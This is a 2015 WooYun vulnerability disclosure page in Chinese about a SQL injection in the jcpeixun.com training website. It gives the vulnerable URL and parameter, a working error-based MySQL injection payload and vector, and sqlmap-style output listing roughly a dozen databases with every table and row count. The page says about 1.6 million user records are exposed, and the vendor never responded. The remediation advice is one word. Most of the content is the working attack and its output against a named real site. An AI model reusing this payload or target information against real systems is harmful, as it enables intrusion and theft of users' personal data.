技成培训网存SQL注入漏洞（涉及160万用户数据）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156801

漏洞标题：技成培训网存SQL注入漏洞（涉及160万用户数据）

漏洞作者：路人甲

提交时间：2015-11-29 22:31

修复时间：2016-01-13 22:32

公开时间：2016-01-13 22:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-29：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-01-13：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

SQL注入漏洞

详细说明：

见漏洞证明

漏洞证明：

http://www.jcpeixun.com/ask/detail.aspx?id=242771

泄漏13个数据库

Database: jcpeixun
Table:pre_common_member
泄漏160万用户信息

Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=242771' AND (SELECT 8558 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(8558=8558,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rRTW'='rRTW
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30319
back-end DBMS: MySQL 5.0
Database: shop
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| jsh_customerrecorder              | 4710    |
| jsh_customerinfo                  | 352     |
| jsh_user                          | 4       |
| jsh_projectinfo                   | 2       |
| jsh_shopinfo                      | 1       |
+-----------------------------------+---------+
Database: jcpeixun
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| jct_videorecord                   | 11813592 |
| jc_stat_videorecord               | 8574588 |
| jcsys_operate_log                 | 7569801 |
| jc_video_logging                  | 6537458 |
| jc_mp_lesson_collect              | 3868355 |
| jcsys_message_base                | 3315379 |
| jc_video_logs                     | 3261850 |
| jc_email_autosrv_sendlog          | 3004373 |
| jcsys_integral_log                | 2144248 |
| jc_learncoin_history              | 1713257 |
| jcsys_message_content             | 1633465 |
| pre_ucenter_memberfields          | 1622551 |
| pre_ucenter_members               | 1620865 |
| pre_common_member                 | 1620841 |
| jc_asset                          | 1617970 |
| jc_learner_search                 | 1617534 |
| pre_common_member_status          | 1617168 |
| pre_common_member_profile         | 1617167 |
| pre_common_member_count           | 1617107 |
| pre_common_member_field_home      | 1617096 |
| pre_common_member_field_forum     | 1617093 |
| jc_learner_detail                 | 1616779 |
| jc_learner_report                 | 1616778 |
| jc_learner_base                   | 1616741 |
| jc_examlog                        | 1195789 |
| jc_mp_play_analysis               | 1003928 |
| jct_videorecord_course_day_stat   | 961674  |
| jc_smsverifycode                  | 857237  |
| pre_home_notification             | 755531  |
| jc_verification_code              | 656961  |
| jc_learncoin_base                 | 621036  |
| jc_learner_position               | 591938  |
| pre_home_follow                   | 586627  |
| jc_smsemailpost_temporary         | 578338  |
| pre_common_member_log             | 448491  |
| pre_forum_post                    | 391799  |
| jc_order_lesson_deatail           | 346450  |
| pre_common_credit_rule_log        | 310900  |
| jc_learner_login_log              | 306357  |
| jc_email_autosrv_openclicklog     | 244197  |
| jc_mobile_area_contrast           | 240106  |
| jc_video_record_visitor           | 238348  |
| pre_home_follow_feed              | 230667  |
| jcsys_scratchcards                | 227513  |
| jc_zd_question                    | 215178  |
| pre_common_onlinetime             | 204513  |
| pre_forum_threadpartake           | 203281  |
| jccrm_mobile_locate               | 174497  |
| pre_home_feed                     | 155374  |
| jc_experience_detail              | 139900  |
| jc_video_capture_error            | 134819  |
| pre_forum_statlog                 | 99901   |
| jc_learner_video_viewlog          | 96911   |
| jc_invitation_activation_history  | 92499   |
| jc_learner_gradechange            | 89247   |
| jc_lessoninfo                     | 88330   |
| jc_learner_key                    | 87741   |
| jc_order_lesson                   | 85840   |
| jc_shopping_cart                  | 67691   |
| jc_favorite                       | 66824   |
| jc_email_autosrv_clicklog         | 64729   |
| jcsys_order                       | 63689   |
| jc_learner_history                | 62512   |
| jc_guide_userdata                 | 60325   |
| jcsys_evaluation                  | 58694   |
| jc_apply_base                     | 51304   |
| jc_examscore                      | 50269   |
| pre_common_district               | 45051   |
| jc_smsxs_rpt                      | 41817   |
| oldorderdetails                   | 37483   |
| pre_forum_thread                  | 37023   |
| jc_lxtest                         | 36152   |
| jcsys_order_info                  | 34903   |
| jc_partner_mobile_all             | 34869   |
| jcsys_orderdetail                 | 33674   |
| pre_common_tagitem                | 28818   |
| jc_partner_mobile                 | 26196   |
| jc_order_procrecord               | 25501   |
| jc_freelook_regstatis             | 23789   |
| jc_remotemeeting                  | 23457   |
| z_zw_11_6                         | 22718   |
| jcsys_info_base                   | 20060   |
| jcsys_info_content                | 19800   |
| pre_forum_attachment              | 17164   |
| jc_drawgift_vmobile               | 16910   |
| jc_adminlogin_information         | 15689   |
| pre_forum_threadpreview           | 15247   |
| jc_hedy_vote_history              | 15062   |
| jc_preferential_card              | 15042   |
| jc_mobilereg_send_member          | 12660   |
| sys_report_date                   | 10980   |
| jc_sitemap_detail                 | 10084   |
| pre_common_credit_log             | 9516    |
| jc_ke_qq_lottery                  | 8841    |
| pre_forum_threadmod               | 8549    |
| pre_forum_threadlog               | 8130    |
| dede_archives                     | 8096    |
| dede_arctiny                      | 8096    |
| dede_addonsoft                    | 8095    |
| jc_oneyuangou_prizecode           | 7976    |
| jc_file_info                      | 7637    |
| jc_questions                      | 6417    |
| jc_sms_send_error                 | 6225    |
| jc_email_online_sendlog           | 6223    |
| jc_orderlesson_log                | 5937    |
| jc_plan_record                    | 5319    |
| jc_exam_certificate               | 5035    |
| jc_ke_qq_apply                    | 5009    |
| pre_home_favorite                 | 4923    |
| pre_common_tag                    | 4616    |
| pre_common_credit_rule_log_field  | 4255    |
| pre_home_follow_feed_archiver     | 3898    |
| jc_user_teacher_questions         | 3809    |
| jcsys_privilege_users             | 3803    |
| jc_file_info_app                  | 3721    |
| dede_sys_enum                     | 3347    |
| jc_course_base                    | 3321    |
| pre_forum_threadimage             | 3264    |
| pre_forum_medallog                | 3202    |
| jcsys_pay_info                    | 3013    |
| jc_video_member_application       | 2985    |
| pre_home_friend_request           | 2977    |
| jc_invitation_link                | 2958    |
| jc_plan                           | 2913    |
| pre_common_member_medal           | 2893    |
| jc_balance_recharge               | 2756    |
| oldfileinfo                       | 2531    |
| pre_ucenter_pm_members            | 2415    |
| jc_partner_buymessage             | 2389    |
| jc_renew_coupons                  | 2344    |
| jc_apply_manage                   | 2335    |
| pre_home_friend                   | 2208    |
| jc_email_autosrv_href             | 2094    |
| silver_user                       | 2051    |
| jc_limit_qa                       | 2028    |
| jcsys_video_comment               | 1964    |
| jc_learner_join                   | 1933    |
| pre_forum_attachment_4            | 1785    |
| pre_ucenter_pm_indexes            | 1776    |
| pre_forum_attachment_1            | 1732    |
| pre_forum_attachment_6            | 1727    |
| pre_forum_postcomment             | 1664    |
| pre_forum_attachment_2            | 1649    |
| pre_common_member_grouppm         | 1647    |
| pre_home_pic                      | 1638    |
| pre_forum_attachment_5            | 1627    |
| pre_forum_attachment_0            | 1624    |
| jc_invitation_activation_card     | 1598    |
| pre_forum_attachment_3            | 1556    |
| pre_forum_attachment_8            | 1548    |
| pre_forum_attachment_7            | 1503    |
| pre_forum_pollvoter               | 1493    |
| pre_forum_rsscache                | 1475    |
| pre_forum_attachment_9            | 1464    |
| jcsys_ad_price_date               | 1422    |
| pre_forum_postlog                 | 1377    |
| jc_yy_callmobile                  | 1360    |
| jct_videorecord_day_stat          | 1334    |
| pre_common_stat                   | 1334    |
| jc_learner_heartfelt              | 1271    |
| z_app_url                         | 1270    |
| pre_ucenter_pm_lists              | 1260    |
| jc_group_temporary                | 1147    |
| pre_forum_modwork                 | 1133    |
| pre_home_friendlog                | 1104    |
| z_lm_order                        | 1039    |
| jc_course_base_category_index     | 1038    |
| pre_home_comment                  | 949     |
| jc_credit_temporary               | 939     |
| pre_common_block_item             | 912     |
| pre_forum_attachment_unused       | 864     |
| jc_yy_interest                    | 838     |
| jc_onlinecoach                    | 834     |
| jcsys_updategrade_log             | 815     |
| jc_zd_answer                      | 772     |
| jc_examusers                      | 725     |
| pre_forum_polloption              | 710     |
| jc_college_users_accounts         | 700     |
| jc_course_chapter                 | 675     |
| pre_forum_postcache               | 675     |
| pre_common_statuser               | 660     |
| jc_pay_log                        | 652     |
| pre_home_pokearchive              | 637     |
| jc_device_apply                   | 627     |
| jc_univers_users_accounts         | 596     |
| jc_balance_cost                   | 579     |
| tt                                | 520     |
| dede_area                         | 482     |
| jc_group_log                      | 478     |
| pre_common_member_action_log      | 471     |
| pre_plugin_vfastpost_stat         | 469     |
| pre_forum_post_tableid            | 460     |
| pre_common_word                   | 443     |
| jccrm_user_base                   | 434     |
| pre_common_setting                | 420     |
| jc_group_join                     | 419     |
| pre_forum_activityapply           | 401     |
| jcsys_dictionary                  | 381     |
| jc_email_autosrv_plan             | 374     |
| jc_activity_exhibition            | 362     |
| jc_learner_recommends             | 359     |
| pre_ucenter_newpm                 | 345     |
| pre_common_syscache               | 343     |
| pre_ucenter_friends               | 315     |
| jc_email_autosrv_waited           | 305     |
| jcsys_message_back_base           | 299     |
| jcsys_message_back_content        | 299     |
| jc_email_autosrv_querysql         | 296     |
| pre_forum_spacecache              | 295     |
| jc_email_autosrv_querysql_ed      | 292     |
| jc_baiduxml                       | 287     |
| pre_forum_ratelog                 | 278     |
| pre_common_session                | 276     |
| pre_home_share                    | 275     |
| pre_common_grouppm                | 260     |
| pre_home_album                    | 250     |
| pre_common_stylevar               | 225     |
| pre_forum_moderator               | 223     |
| jc_invitation_beforegrade         | 214     |
| dede_arccache                     | 204     |
| pre_ucenter_pm_messages_4         | 194     |
| pre_ucenter_pm_messages_1         | 193     |
| pre_ucenter_pm_messages_2         | 192     |
| jcsys_category_base               | 185     |
| pre_ucenter_pm_messages_0         | 182     |
| jc_cashcoupons                    | 181     |
| pre_ucenter_pm_messages_3         | 178     |
| pre_ucenter_pm_messages_7         | 172     |
| pre_ucenter_pm_messages_8         | 172     |
| pre_ucenter_pm_messages_6         | 166     |
| pre_common_smiley                 | 165     |
| pre_ucenter_pm_messages_9         | 165     |
| pre_forum_poststick               | 162     |
| pre_ucenter_pm_messages_5         | 161     |
| jc_product                        | 156     |
| dede_sysconfig                    | 155     |
| jc_union_class                    | 146     |
| jc_group_initiate                 | 143     |
| pre_common_admincp_perm           | 141     |
| pre_forum_forum                   | 140     |
| pre_forum_forumfield              | 140     |
| pre_forum_threadclass             | 139     |
| jcsys_dept_user_relation          | 136     |
| pre_common_template_block         | 136     |
| jcsys_privilege_base              | 135     |
| pre_home_poke                     | 131     |
| pre_home_doing                    | 130     |
| pre_security_evilpost             | 120     |
| pre_common_block                  | 114     |
| jc_hedy_vote                      | 111     |
| pre_common_pluginvar              | 110     |
| pre_common_block_style            | 108     |
| dede_arctype                      | 105     |
| jc_experience_base                | 82      |
| jc_exams                          | 76      |
| jcsys_user_base                   | 75      |
| pre_forum_threadclosed            | 74      |
| jc_advertisement                  | 73      |
| pre_common_failedlogin            | 73      |
| pre_common_nav                    | 73      |
| jc_name3                          | 68      |
| pre_forum_typeoption              | 66      |
| jc_guide_answer                   | 60      |
| jcsys_user_tmp                    | 58      |
| jc_email_autosrv_error            | 57      |
| pre_common_report                 | 57      |
| pre_home_blog                     | 57      |
| pre_home_blogfield                | 57      |
| pre_ucenter_failedlogins          | 54      |
| pre_forum_threaddisablepos        | 53      |
| jc_exam_name                      | 52      |
| jc_lector_hotline                 | 51      |
| pre_common_member_profile_setting | 51      |
| pre_forum_poll                    | 51      |
| jc_guide_lesson_clicklog          | 50      |
| pre_forum_replycredit             | 49      |
| jc_cashcoupons_cost               | 48      |
| pre_common_member_crime           | 48      |
| jc_smsxs_rec                      | 46      |
| jc_lector_base                    | 45      |
| pre_common_block_pic              | 45      |
| jcsys_message                     | 43      |
| pre_myrepeats                     | 40      |
| jc_apply_project                  | 39      |
| jc_siemens_exam_apply             | 37      |
| pre_ucenter_notelist              | 37      |
| jc_friendlink                     | 36      |
| pre_common_credit_rule            | 31      |
| jc_sms_send_log                   | 28      |
| jcservice_task                    | 28      |
| pre_forum_forumrecommend          | 28      |
| pre_ucenter_settings              | 28      |
| jc_union_class_syllabus           | 27      |
| jc_video_error_menu               | 25      |
| pre_common_advertisement          | 25      |
| pre_common_magic                  | 25      |
| jc_guide_question                 | 24      |
| jcsys_dept_base                   | 24      |
| pre_home_clickuser                | 24      |
| jc_univers_class                  | 23      |
| pre_common_block_item_data        | 23      |
| pre_forum_faq                     | 23      |
| pre_forum_medal                   | 22      |
| jc_college_class                  | 21      |
| dede_myad                         | 20      |
| jc_course_subject                 | 20      |
| jc_oneyuangou_events              | 20      |
| jcsys_template                    | 20      |
| pre_common_admincp_cmenu          | 20      |
| jc_video_message                  | 19      |
| jcsys_info_tag                    | 19      |
| pre_common_plugin                 | 19      |
| pre_common_relatedlink            | 19      |
| pre_common_usergroup_field        | 19      |
| pre_forum_trade                   | 19      |
| pre_common_cron                   | 18      |
| pre_forum_imgpolloption           | 18      |
| jc_zd_channel                     | 17      |
| jc_learner_story                  | 16      |
| pre_common_usergroup              | 16      |
| dede_stepselect                   | 15      |
| pre_common_myapp                  | 15      |
| pre_home_click                    | 15      |
| jc_siemens_exam_mission           | 14      |
| jc_univers                        | 14      |
| jc_univers_dept                   | 14      |
| jc_univers_lesson                 | 14      |
| pre_common_taskvar                | 14      |
| pre_forum_promotion               | 13      |
| dede_scores                       | 12      |
| jc_univers_join                   | 12      |
| pre_common_friendlink             | 12      |
| jc_goods_base                     | 11      |
| jc_learncoin_passage              | 11      |
| pre_common_diy_data               | 11      |
| jc_college_dept                   | 10      |
| jc_univers_channel                | 10      |
| pre_home_class                    | 10      |
| jc_weipei                         | 9       |
| pre_common_block_favorite         | 9       |
| pre_forum_activity                | 9       |
| pre_forum_onlinelist              | 9       |
| pre_ucenter_teacher               | 9       |
| dede_arcatt                       | 8       |
| dede_arcrank                      | 8       |
| dede_flinktype                    | 8       |
| jc_univers_power                  | 8       |
| jc_video_advertising              | 8       |
| pre_forum_access                  | 8       |
| pre_forum_warning                 | 8       |
| pre_common_admingroup             | 7       |
| dede_channeltype                  | 6       |
| dede_downloads                    | 6       |
| dede_plus                         | 6       |
| dede_sys_module                   | 6       |
| jc_apply                          | 6       |
| jc_lector_attention               | 6       |
| jc_preferential_card_item         | 6       |
| pre_common_admincp_group          | 6       |
| jc_colleges                       | 5       |
| pre_forum_imagetype               | 5       |
| dede_payment                      | 4       |
| dede_shops_delivery               | 4       |
| jc_college_power                  | 4       |
| jc_exam_pk                        | 4       |
| jc_learner_recommend              | 4       |
| jc_sitemap                        | 4       |
| pre_common_style                  | 4       |
| pre_common_template               | 4       |
| pre_common_word_type              | 4       |
| pre_forum_bbcode                  | 4       |
| pre_home_picfield                 | 4       |
| pre_home_specialuser              | 4       |
| dede_admintype                    | 3       |
| dede_co_onepage                   | 3       |
| dede_flink                        | 3       |
| dede_moneycard_type               | 3       |
| jc_goodsbase_history              | 3       |
| jc_guide_question_group           | 3       |
| jc_learner_mission_base           | 3       |
| pre_common_addon                  | 3       |
| pre_common_admincp_member         | 3       |
| pre_common_member_stat_field      | 3       |
| pre_common_process                | 3       |
| pre_forum_attachtype              | 3       |
| pre_forum_grouplevel              | 3       |
| pre_home_visitor                  | 3       |
| pre_portal_topic                  | 3       |
| dede_addonarticle                 | 2       |
| dede_freelist                     | 2       |
| dede_member                       | 2       |
| dede_member_model                 | 2       |
| dede_member_space                 | 2       |
| dede_member_stowtype              | 2       |
| dede_member_tj                    | 2       |
| dede_sys_set                      | 2       |
| jc_email_autosrv_loginusers       | 2       |
| jc_email_autosrv_tpl              | 2       |
| jc_guide_gqaf                     | 2       |
| jc_guide_type                     | 2       |
| jc_windowsserver_lock             | 2       |
| pre_common_banned                 | 2       |
| pre_common_cache                  | 2       |
| pre_forum_imgpoll                 | 2       |
| pre_home_docomment                | 2       |
| pre_mobile_setting                | 2       |
| pre_ucenter_admins                | 2       |
| pre_ucenter_vars                  | 2       |
| dede_addonimages                  | 1       |
| dede_admin                        | 1       |
| dede_feedback                     | 1       |
| dede_homepageset                  | 1       |
| dede_member_feed                  | 1       |
| dede_member_flink                 | 1       |
| dede_member_group                 | 1       |
| dede_member_person                | 1       |
| dede_member_type                  | 1       |
| dede_multiserv_config             | 1       |
| dede_softconfig                   | 1       |
| dede_vote                         | 1       |
| jc_guide_feedback                 | 1       |
| jc_learner_mission_extend         | 1       |
| jc_preferential_card_relation     | 1       |
| jc_scale_urljump                  | 1       |
| jc_video_messagereply             | 1       |
| jc_zd_administrator               | 1       |
| jcsys_ad_profit_loss              | 1       |
| jcsys_config                      | 1       |
| pre_common_admincp_session        | 1       |
| pre_common_advertisement_custom   | 1       |
| pre_common_block_permission       | 1       |
| pre_common_searchindex            | 1       |
| pre_common_secquestion            | 1       |
| pre_common_task                   | 1       |
| pre_portal_topic_pic              | 1       |
| pre_ucenter_applications          | 1       |
+-----------------------------------+---------+
Database: jcpeixun_tj
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| tj_log_201409                     | 2207623 |
| tj_log_201408                     | 1744064 |
| tj_log_201412                     | 1698252 |
| tj_log_201411                     | 1607426 |
| tj_log_201410                     | 1488027 |
| tj_log_201501                     | 1442763 |
| tj_log_201407                     | 1415866 |
| tj_log_201312                     | 1376001 |
| tj_log_201404                     | 1350066 |
| tj_log_201503                     | 1339984 |
| tj_log_201406                     | 1331901 |
| tj_log_201403                     | 1310061 |
| tj_log_201504                     | 1298609 |
| tj_log_201405                     | 1217453 |
| tj_log_201505                     | 1065551 |
| tj_log_201507                     | 1043021 |
| tj_log_201508                     | 970664  |
| tj_log_201509                     | 939931  |
| tj_log_201506                     | 916113  |
| tj_log_201401                     | 870177  |
| tj_log_201402                     | 850069  |
| tj_log_201510                     | 796222  |
| tj_log_201311                     | 674631  |
| tj_log_201502                     | 648065  |
| tj_log_201511                     | 585372  |
| tj_log_err                        | 162579  |
| tj_log_eamil                      | 39522   |
| tj_cache                          | 25      |
+-----------------------------------+---------+
Database: performance_schema
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| setup_consumers                   | 8       |
| performance_timers                | 5       |
| setup_timers                      | 1       |
+-----------------------------------+---------+
Database: jc_union_org
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| jc_union_lesson_view_detail       | 232140  |
| jc_union_lesson_view              | 185306  |
| jc_u_email_send_log               | 103557  |
| jccrm_notice                      | 7454    |
| jc_u_email                        | 7269    |
| jc_union_events                   | 6326    |
| jc_union_apply                    | 3884    |
| jc_union_lessonarea               | 1588    |
| jc_union_message                  | 411     |
| jc_union_imgs                     | 181     |
| jc_union_lesson                   | 136     |
| jc_u_email_sys_log                | 115     |
| jc_union_anli_comment             | 106     |
| jc_union_anli                     | 105     |
| jc_union_class                    | 102     |
| jc_union_comment                  | 80      |
| jc_union_news                     | 74      |
| jc_union_lesson_content_tags      | 46      |
| zwu_1_copy                        | 46      |
| jc_union_class_syllabus           | 27      |
| jc_union_orgs_contact             | 20      |
| jc_union_orgs                     | 19      |
| jc_union_apply_teacher            | 13      |
+-----------------------------------+---------+
Database: jicheng_app_db
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| courses_chapter                   | 1299    |
| order_status                      | 85      |
| order_record                      | 55      |
| courses_favorites                 | 28      |
| news_read_record                  | 20      |
| appversion                        | 16      |
| courses                           | 15      |
| courses_learn_record              | 10      |
| news_list                         | 9       |
| courses_category                  | 8       |
| authorization_record              | 5       |
| manager                           | 4       |
+-----------------------------------+---------+
Database: mysql
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| help_relation                     | 1047    |
| help_topic                        | 511     |
| help_keyword                      | 467     |
| help_category                     | 40      |
| `user`                            | 3       |
| db                                | 2       |
| proxies_priv                      | 2       |
| proc                              | 1       |
+-----------------------------------+---------+
Database: jc_job_resume
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| jc_job_resume_baseinfo            | 27052   |
| jc_job_user_baseinfo              | 27010   |
| jc_job_resume_edu                 | 22569   |
| jc_job_resume_workexerience       | 21137   |
| jc_job_resume_skill               | 6953    |
| jc_job_collect_searchkeyword      | 5626    |
| jcsys_message_base                | 3379    |
| jcsys_message_content             | 3373    |
| jc_job_resume_box                 | 3055    |
| v_jc_job_resume_box               | 3055    |
| jc_job_area                       | 2910    |
| jc_job_area_new                   | 2910    |
| jc_job_resume_pro_experience      | 2756    |
| date_formate                      | 1095    |
| jc_job_brand                      | 786     |
| jc_job_enterprise_job             | 687     |
| jc_job_industry                   | 422     |
| jc_job_lottery                    | 417     |
| jc_job_subject_reply              | 396     |
| jc_job_enterprise_user            | 352     |
| jc_job_lottery_share              | 179     |
| jc_job_message                    | 156     |
| jc_job_emailsend_sign             | 135     |
| jc_job_subject                    | 134     |
| jc_job_enterprise_deposit         | 128     |
| jc_job_resume_seen                | 99      |
| jc_job_duty                       | 76      |
| jc_job_issue                      | 37      |
| jc_job_enterprise_authorize       | 35      |
| jc_job_product                    | 29      |
| date_formate_hour                 | 24      |
| jc_job_feedback                   | 12      |
| jc_job_lottery_name               | 6       |
| jc_job_issue_type                 | 3       |
| jc_job_resume_baseinfo_detail     | 3       |
| jc_job_resume_message             | 3       |
+-----------------------------------+---------+
Database: loudi
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| jcsys_operate_log                 | 972     |
| ef_study_log                      | 137     |
| ef_learner_account_log            | 95      |
| ef_course_base                    | 56      |
| jcsys_info_base                   | 21      |
| jcsys_info_content                | 21      |
| ef_learner_account                | 20      |
| ef_learner_base                   | 20      |
| ef_study_card                     | 20      |
| jcsys_category_base               | 18      |
| jc_lector_base                    | 17      |
| jcsys_dictionary                  | 16      |
| jcsys_user_base                   | 8       |
| ef_order_base                     | 5       |
| ef_study_course                   | 4       |
| ef_study_base                     | 3       |
| jcsys_dept_user_relation          | 3       |
| jcsys_privilege_base              | 2       |
| jcsys_privilege_users             | 2       |
| jcsys_dept_base                   | 1       |
| jcsys_template                    | 1       |
| jcsys_template_priv_relation      | 1       |
+-----------------------------------+---------+
Database: jcpeixun_exam
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| examlog                           | 19982   |
| questions                         | 388     |
| examscore                         | 134     |
| examusers                         | 108     |
| exams                             | 2       |
+-----------------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156801

漏洞标题：技成培训网存SQL注入漏洞（涉及160万用户数据）

相关厂商：技成培训网

漏洞作者：路人甲

提交时间：2015-11-29 22:31

修复时间：2016-01-13 22:32

公开时间：2016-01-13 22:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156801

漏洞标题：技成培训网存SQL注入漏洞（涉及160万用户数据）

相关厂商：技成培训网

漏洞作者： 路人甲

提交时间：2015-11-29 22:31

修复时间：2016-01-13 22:32

公开时间：2016-01-13 22:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0156801"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云